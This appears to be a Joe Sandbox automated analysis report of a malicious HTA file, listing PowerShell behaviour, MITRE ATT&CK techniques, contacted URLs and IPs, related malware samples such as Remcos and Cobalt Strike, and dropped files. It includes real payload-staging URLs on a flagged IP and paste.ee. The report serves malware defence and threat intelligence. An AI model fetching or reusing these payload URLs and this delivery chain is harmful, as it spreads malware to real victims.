Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	211 Scripting	Valid Accounts	12 Command and Scripting Interpreter	211 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta	30%	Virustotal		Browse
mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta	16%	ReversingLabs	Script-WScript.Trojan.Asthma

Name	IP	Active	Malicious	Reputation
paste.ee	104.21.84.67	true	false	high
cloudinary.map.fastly.net	151.101.1.137	true	false	high
res.cloudinary.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg	false	high
http://57.129.55.225/225/economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven.tIF	true	unknown
https://paste.ee/r/muVvq/0	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.1832151277.0000000005767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122511681.0000000006267000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.1829980353.0000000004858000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000007.00000002.2122511681.0000000005357000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.1829980353.0000000004858000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000007.00000002.2122511681.0000000005357000.00000004.00000800.00020000.00000000.sdmp	false	high
https://go.micro	powershell.exe, 00000003.00000002.1829980353.0000000004BE8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000007.00000002.2122511681.0000000006267000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000007.00000002.2122511681.0000000006267000.00000004.00000800.00020000.00000000.sdmp	false	high
http://go.micros	powershell.exe, 00000003.00000002.1829980353.0000000004BE8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000007.00000002.2122511681.0000000005357000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/koswald/VBScript/blob/master/SetupPerUser.md	wscript.exe, 00000006.00000003.1818240602.0000000004981000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1821597208.0000000004A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1821394695.0000000004E38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1821494173.000000000046F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1822067432.0000000004B88000.00000004.00000020.00020000.00000000.sdmp, economicthingsaregoingaroundwithhusbandwithgoodne.vbs.3.dr, economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven[1].tiff.3.dr	false	high
https://www.cloudflare.com/5xx-error-landing	powershell.exe, 00000007.00000002.2122511681.0000000005463000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbsy	wscript.exe, 00000006.00000003.1818749086.0000000002A87000.00000004.00000020.00020000.00000000.sdmp	false	high
https://res.cloudinary.com	powershell.exe, 00000007.00000002.2122511681.0000000005357000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs	wscript.exe, 00000006.00000003.1821394695.0000000004E38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1821494173.000000000046F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1822067432.0000000004B88000.00000004.00000020.00020000.00000000.sdmp, economicthingsaregoingaroundwithhusbandwithgoodne.vbs.3.dr, economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven[1].tiff.3.dr	false	high
http://57.129.55.225/s	powershell.exe, 00000003.00000002.1833759445.0000000006E3B000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://aka.ms/pscore6lBfq	powershell.exe, 00000003.00000002.1829980353.0000000004701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122511681.0000000005201000.00000004.00000800.00020000.00000000.sdmp	false	high
http://57.129.55.225/	powershell.exe, 00000003.00000002.1833759445.0000000006E3B000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.1829980353.0000000004858000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000007.00000002.2122511681.0000000006267000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.1832151277.0000000005767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122511681.0000000006267000.00000004.00000800.00020000.00000000.sdmp	false	high
http://57.129.55.225/225/economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven.t	powershell.exe, 00000003.00000002.1829980353.0000000004BE8000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://crl.microsofta	powershell.exe, 00000003.00000002.1835596008.0000000007D59000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://57.129.55.225/Automation.resources	powershell.exe, 00000003.00000002.1835596008.0000000007D59000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://github.com/koswald/VBScript	economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven[1].tiff.3.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.1829980353.0000000004701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122511681.0000000005201000.00000004.00000800.00020000.00000000.sdmp	false	high
http://57.129.55.225/225/economi	powershell.exe, 00000003.00000002.1829980353.0000000004BE8000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpgt	powershell.exe, 00000007.00000002.2122511681.0000000005357000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
151.101.1.137	cloudinary.map.fastly.net	United States	54113	FASTLYUS	false
57.129.55.225	unknown	Belgium	2686	ATGS-MMD-ASUS	true
104.21.84.67	paste.ee	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578909
Start date and time:	2024-12-20 16:33:48 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winHTA@16/16@2/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 35 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .hta Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2492 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:34:44	API Interceptor	102x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
151.101.1.137	seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse
	createdbetterthingswithgreatnressgivenmebackwithnice.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse
	greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse
	goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse
	creamkissingthingswithcreambananapackagecreamy.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse
	stage2.ps1	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse
	Invoice A037.xls	Get hash	malicious	Unknown	Browse
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse
57.129.55.225	SWIFT.xls	Get hash	malicious	Unknown	Browse	57.129.55.225/225/enn/mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta
57.129.55.225	SWIFT.xls	Get hash	malicious	Unknown	Browse	57.129.55.225/225/enn/mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta
104.21.84.67	Order_DEC2024.wsf	Get hash	malicious	Remcos	Browse	paste.ee/d/GXRLA
	nr101612_Order.wsf	Get hash	malicious	Remcos	Browse	paste.ee/d/81FCf
	Doc261124.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/MQJcS
	Chitanta bancara - #113243.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/u4bvR
	rdevuelto_Pagos.wsf	Get hash	malicious	AgentTesla	Browse	paste.ee/d/SDfNF
	Product list 0980DF098A7.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/enGXm
	Payment_advice.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/wXm0Y
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/eA3FM
	dereac.vbe	Get hash	malicious	Unknown	Browse	paste.ee/d/JZHbW
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/kmRFs

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cloudinary.map.fastly.net	greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	151.101.193.137
	seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	151.101.1.137
	sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	151.101.193.137
	createdbetterthingswithgreatnressgivenmebackwithnice.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	151.101.1.137
	PO_0099822111ORDER.js	Get hash	malicious	Remcos	Browse	151.101.193.137
	NB PO-104105107108.xls	Get hash	malicious	Unknown	Browse	151.101.193.137
	greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	151.101.1.137
	goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	151.101.1.137
	creamkissingthingswithcreambananapackagecreamy.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	151.101.1.137
	Cot90012ARCACONTAL.xls	Get hash	malicious	Remcos	Browse	151.101.129.137
paste.ee	bad.txt	Get hash	malicious	AsyncRAT	Browse	104.21.84.67
	BBVA S.A..vbs	Get hash	malicious	Remcos	Browse	104.21.84.67
	greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.67.187.200
	seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.67.187.200
	createdbetterthingswithgreatnressgivenmebackwithnice.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	104.21.84.67
	givenbestupdatedoingformebestthingswithgreatnewsformegive.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	clearentirethingwithbestnoticetheeverythinggooodfrome.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.67.187.200
	PO_0099822111ORDER.js	Get hash	malicious	Remcos	Browse	104.21.84.67
	NB PO-104105107108.xls	Get hash	malicious	Unknown	Browse	188.114.96.6

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	58VSNPxrI4.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImJyaWFuLmh1dGNoaW5zQHJpdmVycm9jay5jb20iLCJyZXF1ZXN0SWQiOiJhYzIxMDNjZS03NDZkLTRmMTctNjBkYi00MzM5OWU3NzU5NGEiLCJsaW5rIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9pZC91cm46YWFpZDpzYzpWQTZDMjplOTgwMjRmZi03NGRmLTRlNjctYjJkZi0wNWY0NTk4MTc4OWUiLCJsYWJlbCI6IjExIiwibG9jYWxlIjoicHRfQlIifQ.GzFDC4sqpVLEAHwIPLSleF4_d0iUGb4--dg-spPTHWsUGjt086-aN6bs1cEm-BfvTqQu97RqT5NU-RFwvTkvTA	Get hash	malicious	Unknown	Browse	151.101.1.138
	Invoice for 04-09-24 fede39.admr.org.html	Get hash	malicious	Unknown	Browse	151.101.1.229
	https://alphaarchitect.com/2024/12/long-term-expected-returns/	Get hash	malicious	Unknown	Browse	199.232.168.157
	Ocean-T2I4I8O9.exe	Get hash	malicious	Unknown	Browse	185.199.108.153
	https://click.pstmrk.it/3s/veed.io%2Fshare-video-link%3Ftoken%3DeyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MzQ2MzE2NDgsImlhdCI6MTczNDYzMDc0OCwic3ViIjoiZmY0NTdiM2MtYjI3MC00YzA0LWEwOTEtYjY3ZDJkOGQ3ZTU1Iiwicm9sZXMiOltdLCJraWQiOiJwcm9qZWN0cy92ZWVkLXByb2Qtc2VydmVyL2xvY2F0aW9ucy9ldXJvcGUtd2VzdDEva2V5UmluZ3MvdmVlZC1wcm9kLWtleXJpbmcvY3J5cHRvS2V5cy92ZWVkLXByb2QtandrLWtleS9jcnlwdG9LZXlWZXJzaW9ucy8xIiwiZmVhdHVyZXMiOnt9LCJzY29wZXMiOltdfQ.f-EtSCYYeQiR4cEb8w5ABF3koXpbxl8QeFIarADkLP6q32DzsnFZl76Y98Uad7M8RBPPuOQOV9SUbCY1hRa4IbqV9_4cTm0v7DuBTCKOZbHN1NiATZOGw2BzdEMqIEfnNo5A_H2_DLVQZLtd6sZzcRoNBzbmcq2_xlzWgmqIErGV0VYXIb-Vac1b-3wmAgIyE-VS7Cd5aHYtVyiV9T5HfrpjPl7-M6dLIaQqm6103z7gO_qoKow1qbFmNgGaUsQED1CHbqo-hCgXzib7NToyu0Qq4kSl-2NEzgLMKy1zFR2J0E0vr9FHirjR9fmmDF2nk76Ht8L2WbV-dRyXZBZaUikfojo56vYWI9cfSQrG_awuFNR0M1s6dpPwumDM8sXlMZYt4u5WZaNcRZynPHXeqNZcdwKhlZrFN0U3B3U7B69avz_FlMxw6Or_0aeJkUP5YZP3wH-IIbwwa6es37u8G7gWYINEfp-pJlKV7klV1CcskLf_53iNx7MtxgvAXLMNZJ2tnuxY8W6w_E-pchjpNP2I5NV2Ui2_bNSgl3kBuX3oWsX0m_wL3MZ39pE3paPp2FAIgQPpZ5a0BhmPYsMk2IPPel2dll8j1IYBwHsZ5a1IHsHA6gTMWkJl-uhAjN4mnXo7Om0NWRZvfFvatgA4YCoTXdntM31GIZxAyWF9a14%26postLoginUrl%3D%252Fview%252F3ab9b7be-178c-4289-b29e-75921856f7f5%252F/oMlP/0SC6AQ/AQ/15f5e010-d260-490a-9e5d-79f5643b5481/1/HSOO9aL291	Get hash	malicious	Unknown	Browse	199.232.168.157
	https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2Fpayment	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.199.110.133
	https://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodWIuaW8vNjRkczZmNHM5ZDRmODlzZDRzZjQ2c2Q0ZjYv&i=NWQ0M2E1N2M3M2U5MzQxMGM1NjBhNmQ1&t=dEtlN04wQWZmZ0hqZlpiZEYwVXZ4NHFvc2NQNGtsUWl4Unlndk5helZOaz0=&h=356f16f6a39049efa5b305c7477e094a&s=AVNPUEhUT0NFTkNSWVBUSVZaHP6eDnex344kFPbGkNGwPXEfGJHtcvdIV0gRc1_JzA%20us-east-2.protection.sophos.com	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	Dec 2024_12192924_Image.pdf	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
ATGS-MMD-ASUS	nsharm5.elf	Get hash	malicious	Mirai	Browse	34.0.71.142
	nshsh4.elf	Get hash	malicious	Mirai	Browse	48.200.113.249
	SWIFT.xls	Get hash	malicious	Unknown	Browse	57.129.55.225
	hmips.elf	Get hash	malicious	Mirai	Browse	51.238.254.102
	SWIFT.xls	Get hash	malicious	Unknown	Browse	57.129.55.225
	arm7.elf	Get hash	malicious	Mirai	Browse	57.50.158.22
	nsharm.elf	Get hash	malicious	Mirai	Browse	33.241.131.44
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	56.198.189.231
	la.bot.arm.elf	Get hash	malicious	Mirai	Browse	57.146.109.82
	la.bot.sparc.elf	Get hash	malicious	Mirai	Browse	33.211.47.171
CLOUDFLARENETUS	m21jm5y5Z5.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	gEfWplq0xQ.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	gNjo8FIKN5.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	securedoc_20241220T070409.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	f4p4BwljZt.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	Qmg24kMXxU.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.197.170
	f48jWpQ2F8.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	https://bell36588.yardione.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	R2CgZG545D.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.197.170
	https://account.book-ver.one	Get hash	malicious	Unknown	Browse	104.16.123.96

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	QUOTATION#008792.exe	Get hash	malicious	AgentTesla	Browse	104.21.84.67 151.101.1.137
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.84.67 151.101.1.137
	https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2Fpayment	Get hash	malicious	HTMLPhisher	Browse	104.21.84.67 151.101.1.137
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	104.21.84.67 151.101.1.137
	ktyihkdfesf.exe	Get hash	malicious	Vidar	Browse	104.21.84.67 151.101.1.137
	https://kubota.highq.com/kubota/externalAccess.action?linkParam=248Md4JKaxiIU4vwlQaNq5FLgPVNq03doY6pcXaLJD4%3D&documentDownload=link	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137
	https://kubota.highq.com/kubota/viewUserProfile.action?metaData.encryptTargetUserID=D1l4_GI3rHw=&metaData.updateUserProfileProcess=true	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137
	https://track.samsupport.jmsend.com/z.z?l=aHR0cHM6Ly9zYW1zdXBwb3J0cy1jb20uam1haWxyb3V0ZS5uZXQveC91P3U9ZWJlNTI4YmMtYTNjMS00NjI0LWFmZjEtYzcwNDJmMjczZWIw&r=14771356625&d=20437066&p=1&t=h&h=40dfe9be3647ce867f619b07dd91c655	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137
	Employee_Letter.PDFuJPefyDW1j.url	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven[1].tiff

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 text, with very long lines (11857), with CRLF line terminators
Category:	dropped
Size (bytes):	217490
Entropy (8bit):	5.23324819870069
Encrypted:	false
SSDEEP:	3072:A8gVmI3b0mgfmWu+le9VOv5iG5sVhQ30Wk+70wgA1A:A8gV6e9VOvM
MD5:	7F54FCC18CF1595A91BCF1C61DF774CF
SHA1:	298FAE69662E298AC46E0E1BE5FC679A0F527C22
SHA-256:	891E95AA7D15515DF54F91606A27711C7C6BCE4BE800F6317E5F58843B0ECFB7
SHA-512:	3C368045EBE048EE7E8972E6DCAF92F60772C75A1A2D5CDAAE7E6048AAC8B7CB8FD266C6632B9B7FF17598162600BA517A71B4C9B90D564E0E7C4EBE193ED3BA
Malicious:	false
Preview:	Dim sh 'WScript.Shell object..Dim fso 'Scripting.FileSystemObject..Dim format 'StringFormatter object..Dim suiteFolder 'string: folder where test suite scripts are located..Dim projectFolder 'string: root folder for this project..Dim suiteFilter 'string: filename filter for selecting integration test suites...Dim caption 'string: MsgBox/PopUp title bar text...Dim aDocGens 'array of strings: filespecs for code-comment-based documentation generators...Dim aGits 'array of strings: common filespecs for Git bash and Git GUI executables...Dim aDocs 'array of strings: filespecs for last-minute docs to update before a push...Dim nextItem 'integer: current index of the prepItems array...Dim settings 'integer: controls MsgBox/PopUp behaviour...Dim prepItems 'array: list of prcedure (Sub) names to be called by window.SetTimeout...Dim flagFile 'string: filename of a temp file used by Setup.vbs...Dim versionLink 'web page with version info..Dim editor 'document editor..Dim powershell 'filespec of a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.901113710259376
Encrypted:	false
SSDEEP:	96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:	7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:	22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256:	5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:	D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1144
Entropy (8bit):	5.290848674040258
Encrypted:	false
